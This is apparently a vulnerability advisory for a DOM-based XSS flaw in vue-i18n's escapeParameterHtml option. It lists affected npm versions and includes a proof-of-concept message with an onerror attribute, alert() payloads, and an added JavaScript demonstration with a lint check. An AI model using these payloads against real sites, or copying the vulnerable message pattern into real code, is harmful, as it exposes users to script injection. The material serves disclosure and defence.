An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS14OHFwLXdxcW0tNTdwaM4ABKPO

Severity: Moderate | CVSS: 5.3 | EPSS: 0.00134% (0.33983 percentile)

vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes

Affected Packages

Package: npm:petite-vue-i18n
Affected versions: >= 11.0.0, < 11.1.10; >= 10.0.0, < 10.0.8
Fixed versions: 11.1.10, 10.0.8
3 Dependent packages
9 Dependent repositories
20,302 Downloads last month

Affected Version Ranges

All affected versions

10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 9.14.5, 10.0.8, 11.1.10, 11.1.11

Package: npm:@intlify/vue-i18n-core
Affected versions: >= 11.0.0, < 11.1.10; >= 10.0.0, < 10.0.8; >= 9.2.0, < 9.14.5
Fixed versions: 11.1.10, 10.0.8, 9.14.5
3 Dependent packages
0 Dependent repositories
13,839 Downloads last month

Affected Version Ranges

All affected versions

9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.14.5, 10.0.8, 11.1.10, 11.1.11

Package: npm:@intlify/core-base
Affected versions: >= 11.0.0, < 11.1.10; >= 10.0.0, < 10.0.8; >= 9.0.0, < 9.14.5
Fixed versions: 11.1.10, 10.0.8, 9.14.5
26 Dependent packages
6,081 Dependent repositories
5,823,303 Downloads last month

Affected Version Ranges

All affected versions

9.0.0, 9.1.0, 9.1.1, 9.1.2, 9.1.3, 9.1.4, 9.1.5, 9.1.6, 9.1.7, 9.1.8, 9.1.9, 9.1.10, 9.1.11, 9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.14.5, 10.0.8, 11.1.10, 11.1.11

Package: npm:@intlify/core
Affected versions: >= 11.0.0, < 11.1.10; >= 10.0.0, < 10.0.8; >= 9.0.0, < 9.14.5
Fixed versions: 11.1.10, 10.0.8, 9.14.5
6 Dependent packages
772 Dependent repositories
1,067,070 Downloads last month

Affected Version Ranges

All affected versions

9.0.0, 9.1.0, 9.1.1, 9.1.2, 9.1.3, 9.1.4, 9.1.5, 9.1.6, 9.1.7, 9.1.8, 9.1.9, 9.1.10, 9.1.11, 9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

9.14.5, 10.0.8, 11.1.10, 11.1.11

Package: npm:vue-i18n
Affected versions: >= 11.0.0, < 11.1.10; >= 10.0.0, < 10.0.8; >= 9.0.0, < 9.14.5
Fixed versions: 11.1.10, 10.0.8, 9.14.5
4,626 Dependent packages
42,353 Dependent repositories
6,975,901 Downloads last month

Affected Version Ranges

All affected versions

9.0.0, 9.1.0, 9.1.1, 9.1.2, 9.1.3, 9.1.4, 9.1.5, 9.1.6, 9.1.7, 9.1.8, 9.1.9, 9.1.10, 9.1.11, 9.2.0, 9.2.1, 9.2.2, 9.3.0, 9.4.0, 9.4.1, 9.5.0, 9.6.0, 9.6.1, 9.6.2, 9.6.3, 9.6.4, 9.6.5, 9.7.0, 9.7.1, 9.8.0, 9.9.0, 9.9.1, 9.10.0, 9.10.1, 9.10.2, 9.11.0, 9.11.1, 9.12.0, 9.12.1, 9.13.0, 9.13.1, 9.14.0, 9.14.1, 9.14.2, 9.14.3, 9.14.4, 10.0.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.0.5, 10.0.6, 10.0.7, 11.0.0, 11.0.1, 11.1.0, 11.1.1, 11.1.2, 11.1.3, 11.1.4, 11.1.5, 11.1.6, 11.1.7, 11.1.8, 11.1.9

All unaffected versions

0.0.0, 0.1.0, 0.1.1, 0.1.2, 0.2.0, 0.11.0, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.4.0, 2.4.1, 3.0.0, 3.1.0, 3.1.1, 4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.3.0, 4.3.1, 4.4.0, 4.4.1, 4.5.0, 4.6.0, 4.7.0, 4.7.1, 4.7.2, 4.7.3, 4.7.4, 4.8.0, 4.9.0, 4.10.0, 5.0.0, 5.0.1, 5.0.2, 5.0.3, 6.0.0, 6.1.0, 6.1.1, 6.1.2, 6.1.3, 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5, 7.1.0, 7.1.1, 7.1.2, 7.2.0, 7.3.0, 7.3.1, 7.3.2, 7.3.3, 7.3.4, 7.4.0, 7.4.1, 7.4.2, 7.5.0, 7.6.0, 7.7.0, 7.8.0, 7.8.1, 8.0.0, 8.1.0, 8.1.1, 8.2.0, 8.2.1, 8.3.0, 8.3.1, 8.3.2, 8.4.0, 8.5.0, 8.6.0, 8.7.0, 8.8.0, 8.8.1, 8.8.2, 8.9.0, 8.10.0, 8.11.0, 8.11.1, 8.11.2, 8.12.0, 8.13.0, 8.14.0, 8.14.1, 8.15.0, 8.15.1, 8.15.2, 8.15.3, 8.15.4, 8.15.5, 8.15.6, 8.15.7, 8.16.0, 8.17.0, 8.17.1, 8.17.2, 8.17.3, 8.17.4, 8.17.5, 8.17.6, 8.17.7, 8.18.0, 8.18.1, 8.18.2, 8.19.0, 8.20.0, 8.21.0, 8.21.1, 8.22.0, 8.22.1, 8.22.2, 8.22.3, 8.22.4, 8.23.0, 8.24.0, 8.24.1, 8.24.2, 8.24.3, 8.24.4, 8.24.5, 8.25.0, 8.25.1, 8.26.0, 8.26.1, 8.26.2, 8.26.3, 8.26.4, 8.26.5, 8.26.6, 8.26.7, 8.26.8, 8.27.0, 8.27.1, 8.27.2, 8.28.0, 8.28.1, 8.28.2, 9.14.5, 10.0.8, 11.1.10, 11.1.11

Summary

The escapeParameterHtml: true option in Vue I18n is designed to protect against HTML/script injection by escaping interpolated parameters. However, this setting does not prevent execution of tag-based payloads, such as <img src=x onerror=...>, when the translation is rendered into an HTML context with v-html and the message places the interpolated value inside a tag attribute.

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string contains HTML markup of its own and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, the HTML metacharacters in each interpolated parameter are replaced with entities. That is sufficient when the parameter lands in the text content of the rendered message.

However, it does not account for the attribute context. When the message itself places the parameter inside a tag attribute, the HTML parser decodes those entities again while reading the attribute value, and a payload that contains no escapable characters at all (a bare JavaScript expression, for instance) passes through unchanged. A message that contains an element such as the following therefore remains an XSS vector once it is rendered with v-html:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration (the message deliberately places the {payload} parameter inside an event-handler attribute):

import { createI18n } from 'vue-i18n';

const i18n = createI18n({
  locale: 'en',                // select the 'en' messages defined below
  escapeParameterHtml: true,   // the option under test: escapes interpolated parameters
  messages: {
    en: {
      // the parameter lands inside the onerror attribute, not in text content
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>';

Render the translation using v-html:

<p v-html="$t('vulnerable', { payload })"></p>

Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).
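The following is an added example and not code from the advisory or from the vue-i18n project. It reproduces in plain JavaScript the mechanism described in the Details and PoC sections: parameter escaping is undone by the HTML parser when the escaped text sits inside an attribute value, and a payload with nothing to escape is not changed at all. The escaping routine, the interpolation, and the entity decoder are simplified stand-ins written for this example (assumptions, not the library's own implementation); the check at the end, placeholdersInAttributes, is a lint a practitioner can run over locale messages before trusting them to v-html.

```javascript
// Added example (not vue-i18n's own code): why escaping interpolated
// parameters cannot protect a message that places the parameter inside a
// tag attribute and is then rendered with v-html.

// ASSUMPTION: a simplified stand-in for the escaping that escapeParameterHtml
// applies to string parameters. The real routine lives in the @intlify
// packages; this one only mirrors the idea of turning metacharacters into entities.
function escapeParamLikeI18n(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Minimal named interpolation: {name} is replaced with the escaped parameter.
function interpolate(message, params) {
  return message.replace(/\{(\w+)\}/g, (_, name) =>
    name in params ? escapeParamLikeI18n(params[name]) : '');
}

// What the HTML parser does with a quoted attribute value: decode entity
// references. The decoded string is what the browser hands to the JavaScript
// engine as the event-handler body, so escaping on the way in is undone here.
function decodeEntities(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_, e) => map[e]);
}

// The onerror handler source the browser would compile for the first <img>
// element in the rendered HTML, or null when there is none.
function onerrorHandlerSource(html) {
  const m = html.match(/<img[^>]*\sonerror="([^"]*)"/i);
  return m ? decodeEntities(m[1]) : null;
}

// Check to run over locale messages before trusting them to v-html: report
// every {placeholder} that sits inside an attribute value of a tag, because
// parameter escaping only protects the text context between tags.
function placeholdersInAttributes(message) {
  const findings = [];
  const tagRe = /<[A-Za-z][^>]*>/g;
  const attrRe = /([A-Za-z_:][-\w:.]*)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)/g;
  const phRe = /\{(\w+)\}/g;
  for (const [tag] of message.matchAll(tagRe)) {
    for (const [, attr, value] of tag.matchAll(attrRe)) {
      for (const [, placeholder] of value.matchAll(phRe)) {
        findings.push({ attribute: attr.toLowerCase(), placeholder });
      }
    }
  }
  return findings;
}

// The advisory's message, embedded here as the constructed sample input.
const VULNERABLE_MESSAGE = 'Caution: <img src=x onerror="{payload}">';

// Case 1: the advisory's payload. Every metacharacter is escaped in the
// rendered string, yet the handler source the browser would compile is the raw payload.
const html1 = interpolate(VULNERABLE_MESSAGE, { payload: '<script>alert("xss")</script>' });

// Case 2: a payload with nothing to escape. The escaper is a no-op and the
// handler is ordinary JavaScript that runs as soon as the broken image fails to load.
const html2 = interpolate(VULNERABLE_MESSAGE, { payload: 'alert(1)' });

// Case 3: the same parameter placed in text content, where escaping does its job
// and no <img> element reaches the parser.
const SAFE_MESSAGE = 'Caution: <strong>{payload}</strong>';
const html3 = interpolate(SAFE_MESSAGE, { payload: '<img src=x onerror=alert(1)>' });

console.log(html1);
console.log(onerrorHandlerSource(html1));
console.log(html2);
console.log(onerrorHandlerSource(html3));
console.log(placeholdersInAttributes(VULNERABLE_MESSAGE));
console.log(placeholdersInAttributes(SAFE_MESSAGE));
```

Case 1 shows the escaping being reversed by attribute-value decoding; case 2 shows the executing form of the same message, where escaping never had anything to act on; case 3 shows the only context in which parameter escaping is a complete defence. placeholdersInAttributes flags the vulnerable message and passes the safe one, which is the check worth running over every message that an application renders through v-html.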

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml). Upgrade to the fixed versions listed above (9.14.5, 10.0.8 or 11.1.10); until then, do not render a translation through v-html when its message text places an interpolated parameter inside a tag attribute, and prefer rendering translated markup with component interpolation (the i18n-t component) rather than v-html.
